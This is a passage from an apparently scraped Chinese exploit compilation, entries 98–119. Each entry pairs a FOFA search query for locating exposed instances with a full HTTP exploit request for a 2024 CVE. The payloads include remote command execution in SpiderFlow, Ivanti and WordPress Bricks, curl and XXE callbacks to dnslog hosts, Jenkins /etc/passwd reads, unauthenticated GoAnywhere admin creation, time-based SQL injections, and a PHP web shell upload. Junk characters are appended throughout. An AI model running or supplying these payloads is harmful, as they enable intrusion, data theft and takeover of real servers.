% c+ l% l. z2 |. e  r( M8 s0 @+ `
# ]' a0 s; z/ H+ M6 [0 g. U
: i" A2 L% F: Z98. SpiderFlow爬虫平台远程命令执行1 j( l- p+ @  K, G& b
CVE-2024-01953 r& y0 J( Q& c  a5 G
FOFA:app="SpiderFlow"
- D/ Q$ T8 ]$ Y3 O9 bPOST /function/save HTTP/1.1
. z' z1 n' Y0 {- ?$ IHost: 192.168.40.130:8088
  R% V& g: k  z: d0 J# M- iUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.08 v! M' T  K% ]" ^) P
Connection: close
5 d; C" e0 D+ `, ]- Q+ G! |Content-Length: 121
5 S5 Z6 R8 F9 [- eAccept: */*% |, T, M0 g- P. g8 s
Accept-Encoding: gzip, deflate" Q2 `; G: m: X+ W& y2 e
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
! B  L* ?; L. H9 p- P- q- i% eContent-Type: application/x-www-form-urlencoded; charset=UTF-8
. M9 Z$ R" K( F$ Z1 {4 j% sX-Requested-With: XMLHttpRequest
3 j' X* t  q3 a; k# {( f  O; x( f+ _2 R$ N/ V# P# O8 }
id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B6 U+ W0 ]) N; x1 T
4 n2 v- r& |, b3 ^
# }9 O8 c. z; s, Q( _. F  ^; l& Y( j
99. Ncast盈可视高清智能录播系统busiFacade RCE
$ M  g3 e1 d2 a, ZCVE-2024-0305
7 n, Y7 M0 k& D; B! Z0 c& T+ b) }FOFA:app="Ncast-产品" && title=="高清智能录播系统"6 C! i% b1 e1 O8 b& Y% O
POST /classes/common/busiFacade.php HTTP/1.19 q" m. B& B0 ^5 }1 E* C( E
Host: 192.168.40.130:8080
2 n0 s) k" }$ vUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.07 U: v/ U4 u$ c# a
Connection: close
; T( a, B9 u4 n% oContent-Length: 1541 l3 h9 X2 p$ ^: L
Accept: */*
3 W: _, m; x5 u" z0 k7 H# h/ v6 [Accept-Encoding: gzip, deflate
6 X5 @+ `4 Z: B+ f! H3 eAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
! g. M$ _3 V" h) f$ O* h5 \( dContent-Type: application/x-www-form-urlencoded; charset=UTF-80 }5 E% V# ^3 f' T& i, f: f0 h
X-Requested-With: XMLHttpRequest
$ D, K) ^& ?" M! D1 q
. O) d9 C/ V; R3 r  X- [6 M%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D
* p3 |5 i. }4 u! H6 a
( W, W! m9 i) ]/ |* v1 N
* x; h0 G3 f. C1 D100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传$ |5 ^+ V* v8 L
CVE-2024-0352
, W3 r5 W+ |8 s% j% eFOFA:icon_hash="874152924"
2 Q4 I& m  V$ a7 q1 o4 dPOST /api/file/formimage HTTP/1.1( O# g+ Q# ^7 n. O
Host: 192.168.40.130
5 W5 i. e% U. J6 V6 q: b& QUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
8 ^7 Z4 B- m. X) E+ JConnection: close
3 h& i+ c# H' eContent-Length: 201+ Y+ v) u/ {$ D( R" I
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei8 ]- W. D& c. ?7 x$ ~; C9 ~6 a1 c
Accept-Encoding: gzip: H! v$ g  x: l" V

# ~6 S" \; h' W# q- r------WebKitFormBoundarygcflwtei
4 R3 g! E- e) e) \/ GContent-Disposition: form-data; name="file";filename="IE4MGP.php"9 }) p" c' q1 d$ A! F
Content-Type: application/x-php
5 N6 S7 L+ n5 v* _. Z+ T7 E( m  @
2ayyhRXiAsKXL8olvF5s4qqyI2O
  y& P9 s' @6 p* \------WebKitFormBoundarygcflwtei--  c; G$ c- J( }; M$ g6 W: E
" |) [! t: Z7 h: |/ F

$ x7 O3 d" }' B4 D' Q3 q: j101. ivanti policy secure-22.6命令注入1 |+ j& `6 |. s8 D$ c' V
CVE-2024-21887
* {  R, n. G) N0 Z" JFOFA:body="welcome.cgi?p=logo". m- v8 D2 B* j
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1' {. R1 `3 B. ^$ y1 T9 ?
Host: x.x.x.xx.x.x.x
( S" Y* {0 \& A1 X" K! b8 `1 x% oUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
2 s, J$ O4 c8 L9 |8 n( jConnection: close% X' \4 U. ^/ M
Accept-Encoding: gzip% Y1 T* o; A3 k) P) [

+ L( a+ W! J9 o. J/ a; ?# D9 Y- J( S9 g6 _9 h- n/ `
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行( h" ~- B1 K9 @" j% n, v2 l
CVE-2024-218931 Q/ |3 |( x; L2 @* P
FOFA:body="welcome.cgi?p=logo"3 r; t8 Z$ V* r% L8 l1 W
POST /dana-ws/saml20.ws HTTP/1.1
" X" j% [0 o$ H: i3 @& yHost: x.x.x.x+ G+ f) L. I( `1 E
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.364 G, d9 Y+ O% `8 ^5 @! L
Connection: close, ~2 Y) m3 T0 Y  @0 Y4 L. e
Content-Length: 792
# k% s6 T# ]3 t: hAccept-Encoding: gzip
: Y; {8 {7 \& W' y- ]% r" I# L  P9 z  b6 }" U
<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body>             <ds:Signature           xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                   <ds:SignedInfo>                        <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/>                         <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>                    </ds:SignedInfo>                       <<ds:SignatureValue>qwerty</ds:SignatureValue>                    <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                         <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/>                   </ds:KeyInfo>                  <ds:Object></ds:Object>         </ds:Signature> </soap:Body></soap:Envelope>8 w/ Z+ M) u8 u& r; A( ^

$ B: ?$ o9 Q, C2 V* j4 b7 c1 [103. Ivanti Pulse Connect Secure VPN XXE' q8 I  H1 P2 x* P5 Q
CVE-2024-22024
% h( S5 r; }- z0 g+ @FOFA:body="welcome.cgi?p=logo"
3 M( Z+ w7 f9 G( i1 d$ ^( k5 d4 |POST /dana-na/auth/saml-sso.cgi HTTP/1.1
! W6 c# j" W% l6 EHost: 192.168.40.130:111  a" N3 y; x, V, P/ k$ L
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36/ m  T+ |/ t- r2 v  K# K
Connection: close6 ]- ]1 o8 o/ u0 a& |- h
Content-Length: 204
, x+ O' @, O) o5 |! s' U1 DContent-Type: application/x-www-form-urlencoded
1 v  Q' q% m$ U# ]& K0 w/ e) NAccept-Encoding: gzip" F8 \9 i4 \# u0 M* Y. E
; [# d; c: H4 e
SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==# v: y: W$ {' ^: J* e7 Z5 w8 R

2 z! y% P* G& q1 ~( J
- ?3 j" s" \, x$ W$ {' ~其中SAMLRequest的值是xml文件内容的base64值,xml文件如下! }5 `' i8 C% @7 Y
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>
' k$ w7 u1 O6 }3 d# M- ^$ g8 h  c. [  G9 T' g! R9 w% Y
5 F: M4 n! M8 x' D/ J  a
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露# \9 y: Y* P- U* b
CVE-2024-0569& A& V% p. m6 }7 U. ~0 a0 Q
FOFA:title="TOTOLINK"# r, S1 y5 e, V+ L8 J
POST /cgi-bin/cstecgi.cgi HTTP/1.1
# N( o* `' T( }- g9 v, DHost:192.168.0.1
0 K% ^% t( x8 a( ^' BContent-Length:41
* {# i0 p2 Z# ]1 W9 |Accept:application/json,text/javascript,*/*;q=0.01
* v0 ^9 p9 L2 G$ n' AX-Requested-with: XMLHttpRequest4 N: @7 p/ S6 P, ~( e: R9 o
User-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.363 R* N& |; v7 ~9 v  @) {
Content-Type: application/x-www-form-urlencoded:charset=UTF-8
9 R! ~+ y% d1 Q) P) g: W  `Origin: http://192.168.0.17 {+ y) Y' i: F7 I, `7 e
Referer: http://192.168.0.1/advance/index.html?time=1671152380564/ Y1 v7 n% W8 R
Accept-Encoding:gzip,deflate4 S. U8 h0 {& ]) {2 K- [3 [3 l
Accept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.71 T5 R# v  E  M- }& P$ Z
Connection:close
  j( i- [$ q' s0 G7 }0 l$ J9 L  E. A
{- s8 r6 t( Q; ~5 O
"topicurl":"getSysStatusCfg",3 Z$ S2 g3 L( h( z# Z; S& b& ?
"token":""
# T- s/ H# j7 r6 |}3 i+ E# w9 G/ a( w' Y
) H: A+ l( w! I( {9 k
105. SpringBlade v3.2.0 export-user SQL 注入8 i$ f. F3 z; c3 }
FOFA:body="https://bladex.vip"
9 p: F; r% j4 X; [http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1
6 M. b% p4 U6 f; ~3 F/ \( l( T; t' x. A5 n- L- f
106. SpringBlade dict-biz/list SQL 注入; X8 [8 z1 g& B) l; `3 O1 P" |9 n+ G
FOFA:body="Saber 将不能正常工作", }: T' S2 _, `7 N2 X# n
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
! e# u6 ^9 T, p& n4 E3 `0 ~& XHost: your-ip+ ~8 D& Y& t5 e9 c9 v2 |
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
2 z$ @; t, q  s- pBlade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
& A% h. ^9 A3 O; w% m/ c5 R, jAccept-Encoding: gzip, deflate) u: L# E, y: x7 A0 f" t
Accept-Language: zh-CN,zh;q=0.9
! ~. M) j, @9 K1 B4 s9 u0 KConnection: close/ n& \% U- X: G5 P

4 g$ W% w) A: c) x6 _  ^2 ]* g7 }3 p3 |( G: X6 w
107. SpringBlade tenant/list SQL 注入) h9 f5 r* ?/ ]
FOFA:body="https://bladex.vip"; B/ ~2 h/ N' U2 d" c/ _: _
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1( v! _4 A/ a1 r1 |$ v& L' p
Host: your-ip% q: ~  C+ Y  G) v# V! y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.363 q1 r" O' C0 J$ R; ~9 b0 d
Blade-Auth:替换为自己的
8 m. w4 |! R' q! H8 s7 w) UConnection: close+ }0 I" p0 D9 j8 R( a, G
% S/ N$ {5 o2 g9 _8 y* d% ]2 J" k" e
& A$ {* H2 F7 r& ]  V
108. D-Tale 3.9.0 SSRF
$ i$ c) ?% j$ r  \: x  {CVE-2024-216427 W& a' V1 T6 G
FOFA:"dtale/static/images/favicon.png"
2 k, G! A: G5 ^+ [! m8 Z3 J% [, qGET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
/ r. w( i0 u4 Z$ BHost: your-ip7 Y: o  f3 X* O4 Q; t5 L3 W. S; i
Accept: application/json, text/plain, */*
+ S7 a3 L2 N# F- [' o8 c  fUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
$ V! ?1 n2 G5 v7 J- S2 d9 O0 oAccept-Encoding: gzip, deflate
$ Z) I: v; _+ E# e$ S2 _6 q! NAccept-Language: zh-CN,zh;q=0.9,en;q=0.8
6 X3 w) B& C4 Z' ]7 e9 \Connection: close5 d. W4 ]4 y4 a: [! v) l, z) t

" o0 s! z$ }$ W. T" H
& i5 W0 |# ~. ~0 D; h, w109. Jenkins CLI 任意文件读取
4 p0 u& r* P1 h/ E, yCVE-2024-23897
+ A  a/ l( s( n% dFOFA:header="X-Jenkins"3 z( c8 ^: G+ z2 _
POST /cli?remoting=false HTTP/1.1
( W; X& e4 b2 KHost:
1 L% \* M5 v; J, N# m1 r8 a2 C' GContent-type: application/octet-stream! y) o; K* Y- c
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92* f6 o1 s( t/ Y: P& }! F
Side: upload' g# K" a) [4 t7 F  \
Connection: keep-alive
: ^2 `9 ]" E- |! n% [/ I& i, CContent-Length: 163
" E$ @2 o* j+ j6 t4 W  k2 k" n% g, e5 ~/ }1 M/ R3 [/ g
b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'/ Z4 O; D2 X, {9 s; i5 g) x
' h5 V! c* G; Q  I" x" J1 V% F

% h8 M: n5 U1 H: b' cPOST /cli?remoting=false HTTP/1.1
% l2 O9 Z: s0 O3 J1 \Host:- I8 P0 Z% ?# y+ r/ T
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
& A/ W' V% S  hdownload
* c1 T" j: p% R% NContent-Type: application/x-www-form-urlencoded- M! Z: ~& A8 T
Content-Length: 0
) U/ Y  A% F2 [' J5 g- M# C
$ m1 n7 q' J+ j8 P1 ?8 n
! {! t! S* M* e5 t& ~* YERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
8 u7 _# }' Z/ q; x3 o5 Z" ajava -jar jenkins-cli.jar help
0 k6 P; K3 S. ?& D8 D[COMMAND]; z6 z1 C5 Z# F* W8 V- `( _
Lists all the available commands or a detailed description of single command.
/ J4 `! ~# E9 `& Q0 o! E COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)% ~7 N; B; C" c. }4 _5 V: t( c* S; f
1 |+ }4 I8 y2 V; d

! F* L! n* X- H2 `110. Goanywhere MFT 未授权创建管理员
, x/ M8 |$ E# l$ ~0 W+ Z% ^9 vCVE-2024-0204) `  Y# L4 v- c3 O* c. K
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
" z1 Y7 ]4 o3 c5 ?, e! S6 OGET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1! V( i" x( b- s, n) u7 d
Host: 192.168.40.130:8000% x7 R  X  [7 E5 g( R- Y- \2 B- u
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
! D, y5 z& s1 r" _Connection: close! `- L- |4 n" T( y
Accept: */*: V) b- ]$ P6 g  h' \) ~
Accept-Language: en
3 W: o/ `& g1 L' p# K/ o4 f% K- NAccept-Encoding: gzip
1 F  o+ z) ]& h* }0 i! N  y& D6 p& l: F2 H  H! c, |
1 y7 o  }& J  x9 Z6 B; w
111. WordPress Plugin HTML5 Video Player SQL注入( _( M0 R, `' `) B- n$ C  K5 Y
CVE-2024-1061
" A. Y: ~1 \3 {FOFA:"wordpress" && body="html5-video-player"% f% M' K# A! P( O$ a
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
5 T* d) y8 f8 W% T" yHost: 192.168.40.130:112! G' K! f% h. P/ x- K' ]9 [: a8 [( w
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
, D) [0 J' n' M! }: }Connection: close  j. a( s& }; o  H! `4 I
Accept: */*! _/ ^4 X7 S- G$ x' y% }: u/ e
Accept-Language: en
  s9 Z% ]$ [: QAccept-Encoding: gzip
+ R. W6 C# r' \, n8 B
* `2 L6 ~! a  J/ y/ o% A4 u2 Q5 k
- L; [0 d2 D0 e/ ^/ z2 _( F112. WordPress Plugin NotificationX SQL 注入# Q& L6 ?! v* ]; V+ M
CVE-2024-1698
6 S: s5 L  F) G+ w% ~/ W5 EFOFA:body="/wp-content/plugins/notificationx"# W" G1 L7 H7 v4 r( p! d
POST /wp-json/notificationx/v1/analytics HTTP/1.1
1 e. P3 V- P  O) \Host: {{Hostname}}1 f% p0 N2 Z* J; q
Content-Type: application/json
5 q7 M1 x# N! t% n: l. p; e2 p+ h! O0 b: F3 z2 H7 L1 |
{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}- ?, l+ B7 C- ^$ }+ |

" x2 F, J- o+ g/ f' k# [1 t
: w; q: C: f3 i1 h! j113. WordPress Automatic 插件任意文件下载和SSRF: ]$ K' ~( _1 V  W, ^4 \8 ~9 H* P
CVE-2024-279540 m6 {/ s6 f9 v+ r. ^
FOFA:"/wp-content/plugins/wp-automatic"6 E1 |. x$ P6 N* J5 R
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1' ~7 l8 e) O# J5 @( s* O8 m
Host: x.x.x.x; r% u7 N1 W) k# f- X
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
# m6 u2 a  S1 R# m  K. l; t, @. l6 ZConnection: close* n" ?2 d% J* |( z. H" o
Accept: */*/ o1 W5 c, ?/ X8 `. v1 X
Accept-Language: en, U* B' Z0 C% [5 N$ j: u; z
Accept-Encoding: gzip! X+ \1 O' r) i+ k" w) d0 @

+ p) u& ^0 I) u+ ~* M6 F; O, m. Z% o! b) o" A5 k
114. WordPress MasterStudy LMS插件 SQL注入
/ m( Z) z1 L2 ~  C& |FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"! e$ j9 ^& r9 l. Q3 j5 C5 z
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
7 _' s$ P! T5 p+ j% o9 yHost: your-ip
3 v$ n% W+ f. |! N( [) BUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
/ s" i" x* E2 S- U, ?% p8 x( Z; t, ?4 {Accept-Charset: utf-8
# c5 J4 x0 Z0 X6 i/ C. Y$ ~Accept-Encoding: gzip, deflate1 A& V* m; M% _0 \6 u5 J$ `+ E
Connection: close
$ {( r. s" u) u; P, r. t, t4 }0 ^6 F
& o  e( B' n, C  a
115. WordPress Bricks Builder <= 1.9.6 RCE( s1 p# X; Y) |/ w3 V
CVE-2024-25600
- e3 c: K; `8 @7 k$ i+ n2 K7 DFOFA: body="/wp-content/themes/bricks/"3 q2 b5 O) D4 e8 _
第一步,获取网站的nonce值7 k" \) P# L0 t9 V  [
GET / HTTP/1.1- S  x5 _. ?3 R3 z$ n! I& D/ q0 g' D
Host: x.x.x.x8 I0 r8 ~* f# W% k; L
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36- }$ \# q( x  ]; ~: t
Connection: close( J1 l3 s. N8 p, h( ]5 Z
Accept-Encoding: gzip, I9 q" C- Q( E# K- C; e3 a

* ]' Q) B) b5 D1 _* w! q5 d0 J' `5 E' B; V0 B# W; J! P
第二步替换nonce值,执行命令* V* ?. h0 z. A3 `3 i
POST /wp-json/bricks/v1/render_element HTTP/1.1
$ [$ z, ?. Y  hHost: x.x.x.x3 v! C$ k4 M( R* `/ {/ @
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.366 y: w$ O  V; r0 ~* S! g
Connection: close
3 C8 N' Q4 t2 x2 P$ H# @: b' PContent-Length: 356
2 a: g( T3 B+ ]' r- wContent-Type: application/json
8 |- B+ J' U+ w. P8 w1 M: QAccept-Encoding: gzip( h( x0 ~& F2 @/ C1 i5 d

7 X# e5 ?. n  y* m  a2 w0 a, V{% `* V# w: {- ^  `" V1 x( k6 R3 _
"postId": "1",6 p. W. K$ a4 m: J: P  b8 a
  "nonce": "第一步获得的值",8 K1 G# p" b( V  y
  "element": {
7 Z: v  G7 q" v/ S% A, l' o. J    "name": "container",
9 B' s; a% o* G$ }4 P2 W    "settings": {
4 _* S# c! D) t+ ^. Q$ g      "hasLoop": "true",
6 `3 }2 y) y# O" R      "query": {& ^6 }1 q+ ]# I3 d6 U* Y& t
        "useQueryEditor": true,# N0 H8 F" u; W/ h# l. a
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",+ P' J4 T* J! Y8 p- Q
        "objectType": "post"
# j4 U# W8 k* `# z1 P      }
& Q, b7 e- |3 \8 b2 k3 ?$ _) w5 B    }* Z" w7 w$ O& }# C
  }0 E, o6 i# ~! i& b
}
8 x( ?* f8 z. P3 s1 U% K$ B+ G4 u. b1 H& p# n! G8 M7 Q
4 v4 z; L) J% u) v' i- T' H9 w: p
116. wordpress js-support-ticket文件上传
5 j, R1 C: u" A; X- l- ?# R5 kFOFA:body="wp-content/plugins/js-support-ticket"
+ v0 X4 j/ z2 t  v- {: VPOST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1. V7 Z5 b+ Z! n
Host:6 h% J5 C: _' Z2 d" U9 i* s
Content-Type: multipart/form-data; boundary=--------767099171
2 H" g4 M, {& K- YUser-Agent: Mozilla/5.0+ W6 Z7 Y$ X- l" v& C
& B7 x9 X; i- q
----------767099171
9 R4 c( \: \5 G# j+ X- VContent-Disposition: form-data; name="action"
0 J0 j# B# p/ R( J2 X/ Mconfiguration_saveconfiguration" w* b) ?4 c7 _3 J3 B0 X
----------767099171
, l' r1 ]( c4 Q8 N6 z5 w: lContent-Disposition: form-data; name="form_request"
5 H+ `. {( i. _9 v& E* Ejssupportticket7 h$ n' X; z4 O8 Q
----------767099171! U- O: ~( K  U8 V+ F1 C7 P
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
8 `3 m' c% @% v  Z8 W  l6 j8 UContent-Type: image/png' I8 T/ _' |1 i/ }
----------767099171--
+ R* v% G3 G# |$ u1 Y; r7 @, P6 ]) B+ l& j, ^% \) [

: K$ w$ N8 ~4 d0 o# l( `1 Z117. WordPress LayerSlider插件SQL注入
" S4 }4 i* Z+ p6 C6 e) @! g+ x1 |version:7.9.11 – 7.10.0( k& D2 R$ H  t/ ^8 V
FOFA:body="/wp-content/plugins/LayerSlider/": C& M; e7 ?; w1 N$ J. _
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1% U# p; H( C3 i5 q, r- S6 x. o
Host: your-ip
: S5 r4 @: r: N4 r8 NUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
: y1 v9 ^. y5 Z' s# S& hAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8" f1 b" l4 e* i- Q0 o% `1 y1 U
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
5 h9 R2 K6 N7 ?6 M5 dAccept-Encoding: gzip, deflate, br
. ?" I& d# p* [4 xConnection: close
. k  E) O4 A: ]. j* ]6 t6 TUpgrade-Insecure-Requests: 1% G! e/ a1 z/ ~6 M& K3 J4 L' V# j
3 A3 H5 `! B: k4 c# o& K7 E
1 _& X, H" |; M+ s6 e4 |
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传" i. B8 z7 ?9 i3 T" V3 W' e+ |, I- k
CVE-2024-0939
. _6 ^. J& m2 c) X1 P$ P8 E' r- p6 \FOFA:title="Smart管理平台"- ]2 g9 v8 V: h; D2 X
POST /Tool/uploadfile.php? HTTP/1.1
) T/ Z- o( s! V* N# B( XHost: 192.168.40.130:8443% `2 F$ V# x. ]7 R* E' N
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8. _- v9 W: Q( Z* F: y) _, G$ J* g1 R
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
" M# G3 I. ]8 XAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8" y  |4 E2 ?& X
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
9 @) Z5 z! g( F, k: h  r6 oAccept-Encoding: gzip, deflate
' D; u1 n1 g; A+ ~Content-Type: multipart/form-data; boundary=---------------------------139797012227476466340371828873 N' Q7 B" j* G+ W
Content-Length: 405
( B& h4 |5 }0 w% E( @Origin: https://192.168.40.130:8443$ Y+ A3 ]8 k8 b' I" l1 ^; G" t
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
2 W2 S/ T6 U8 s; V5 Z' i8 \Upgrade-Insecure-Requests: 17 r& i" t5 p. Y- N
Sec-Fetch-Dest: document
$ T* D: b% u6 @: u4 ESec-Fetch-Mode: navigate8 ]: |) \3 ~* ^  t( S9 |4 U
Sec-Fetch-Site: same-origin3 O& w2 t7 U+ ]1 v) F* R3 ^
Sec-Fetch-User: ?1( N) c, w' r$ K9 h8 d4 U
Te: trailers8 j6 E4 A" b/ J9 A- `
Connection: close' n# t: _# M( A2 E1 \% v/ i

! S; |/ H" a2 C6 ^* Y-----------------------------13979701222747646634037182887! w3 L& F, ^6 s4 H* u1 B
Content-Disposition: form-data; name="file_upload"; filename="contents.php"/ U) y0 a2 A. N" ?1 Z+ Q/ c; U
Content-Type: application/octet-stream) G" Z4 ~9 h( y2 R0 Q
5 Y* u6 r! C2 h( i2 H9 z
<?php
) G" a9 }. C1 d1 rsystem($_POST["passwd"]);7 i% o0 l( C9 L3 U2 s3 v& s
?>
+ z0 h0 i9 ^, k0 B2 n3 h& ]; }5 O' a-----------------------------13979701222747646634037182887! L/ C% m& q2 k% q; x% }
Content-Disposition: form-data; name="txt_path"3 X- T1 K6 X( a" Y) B: m
; V3 j/ {: W. p% N# w. Y" Z
/home/src.php
5 W( A3 i3 I0 E1 Y7 X-----------------------------13979701222747646634037182887--
5 N, o, D( n5 {2 ^0 _4 w
  p( P3 V2 r1 p; U, U& d8 s/ u$ {
: D/ n3 n! S9 k& ^3 r+ Z0 H% s访问/home/src.php
8 J7 c" ^. Z9 f/ A9 e8 {- O9 |5 M# k. `3 k' d
119. 北京百绰智能S20后台sysmanageajax.php sql注入
/ y, Z+ ^9 Y2 R+ E' L& l! S- jCVE-2024-1254
- l2 c5 B/ X1 ^  {) J0 r5 C8 DFOFA:title="Smart管理平台"
( y6 N( o, T8 Z" A( t( @先登录进入系统,默认账号密码为admin/admin
